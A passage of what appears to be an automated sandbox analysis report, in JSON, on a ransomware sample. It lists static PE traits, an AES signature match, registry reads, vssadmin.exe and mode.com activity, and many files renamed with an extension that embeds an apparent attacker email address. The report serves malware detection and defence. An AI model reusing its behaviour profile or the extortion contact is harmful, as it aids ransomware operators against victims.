\"Microsoft Linker\" and name: \"Linker\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"DISMHOST.EXE.67A614A7.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67A614A7.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"MODE.COM.67A60B94.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"MODE.COM.67A60B94.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0\" has an executable section named \".text\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" has an executable section named \".text\"\n \"DISMHOST.EXE.67A614A7.bin\" has an executable section named \".text\"\n \"MODE.COM.67A60B94.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"DISMHOST.EXE.67A614A7.bin\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n \"MODE.COM.67A60B94.bin\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0\" has an writable section named \".data\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" has an writable section named \".data\"\n \"DISMHOST.EXE.67A614A7.bin\" has an writable section named \".data\"\n \"MODE.COM.67A60B94.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"DISMHOST.EXE.67A614A7.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"MODE.COM.67A60B94.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Pattern Matching", "identifier": "yara-103", "type": 13, "relevance": 5, "name": "YARA signature match - AES encryption", "description": "YARA signature for AES encryption matched on file \"sample.bin\"\n YARA signature for AES encryption matched on file \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe.2434220927\"\n YARA signature for AES encryption matched on process \"00000000-00006140\"", "origin": "YARA Signature", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"DISMHOST.EXE.67A614A7.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"\n \"MODE.COM.67A60B94.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"mode.com\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"mode.com\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"vssadmin.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"vssadmin.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"vssadmin.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" reads file \"c:\\autoexec.bat\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" reads file \"c:\\config.sys\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" reads file \"c:\\dotnet48.exe.id-085cda53.[vijurytos@tuta.io].v\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" reads file \"c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\excelmui.msi.id-085cda53.[vijurytos@tuta.io].v\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" reads file \"c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\powerpointmui.msi.id-085cda53.[vijurytos@tuta.io].v\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" reads file \"c:\\msocache\\all users\\{90140000-0019-0409-0000-0000000ff1ce}-c\\publishermui.msi.id-085cda53.[vijurytos@tuta.io].v\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" reads file \"c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\outlklr.cab.id-085cda53.[vijurytos@tuta.io].v\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" reads file \"c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\outlookmui.msi.id-085cda53.[vijurytos@tuta.io].v\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" reads file \"c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.en\\proof.msi\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" reads file \"c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.es\\proof.cab.id-085cda53.[vijurytos@tuta.io].v\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NETWORKPROVIDER\\HWORDER\"; Key: \"\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-237", "type": 6, "relevance": 3, "name": "Opens a handle to the specified process", "description": "\"vssadmin.exe\" opens a process \"C:\\Windows\\System32\\vssadmin.exe\" (UID: 00000000-00004048)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"\\Device\\NamedPipe\\\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"C:\\Program Files\\Common Files\\VMware\\\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"\\Device\\RdpDr\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.msi\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.msi.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"\\Device\\LanmanDatagramReceiver\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.cab\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.msi\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.cab\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.msi\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.msi.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to touch file \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.msi\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\Program Files\\Common Files\\VMware\\\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.msi.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.msi.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.msi.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OnoteLR.cab.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\dwtrig20.exe.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeLR.cab.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.msi.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\osetupui.dll.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\Program Files\\7-Zip\\7z.sfx.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\Program Files\\VMware\\\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\Program Files\\7-Zip\\7zG.exe.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\VMware\\\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\Program Files\\7-Zip\\descript.ion.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\ProgramData\\VMware\\\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Esl\\AiodLite.dll.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\VMware\\\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" trying to access non-existent file \"C:\\Users\\All Users\\VMware\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" writes file \"c:\\autoexec.bat.id-085cda53.[vijurytos@tuta.io].v\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" writes file \"c:\\config.sys.id-085cda53.[vijurytos@tuta.io].v\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" writes file \"c:\\dotnet48.exe.id-085cda53.[vijurytos@tuta.io].v\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" writes file \"c:\\msocache\\all users\\{90140000-0016-0409-0000-0000000ff1ce}-c\\excelmui.msi.id-085cda53.[vijurytos@tuta.io].v\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" writes file \"c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\powerpointmui.msi.id-085cda53.[vijurytos@tuta.io].v\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" writes file \"c:\\msocache\\all users\\{90140000-0019-0409-0000-0000000ff1ce}-c\\publishermui.msi.id-085cda53.[vijurytos@tuta.io].v\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-113", "type": 6, "relevance": 5, "name": "Touches files in program files directory", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\7-Zip\\7z.sfx.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\7-Zip\\7zG.exe.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\7-Zip\\descript.ion.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Esl\\AiodLite.dll.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\AppCenter_R.aapp.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\Compare_R_RHP.aapp.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\CPDF_Full.aapp.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\CPDF_RHP.aapp.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\Edit_R_Exp_RHP.aapp.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\Edit_R_Full.aapp.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\Edit_R_RHP.aapp.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\EPDF_Full.aapp.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\MoreTools.aapp.id-085CDA53.[vijurytos@tuta.io].V\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" touched file \"C:\\Program Files\\Adobe\\Acrobat Reader 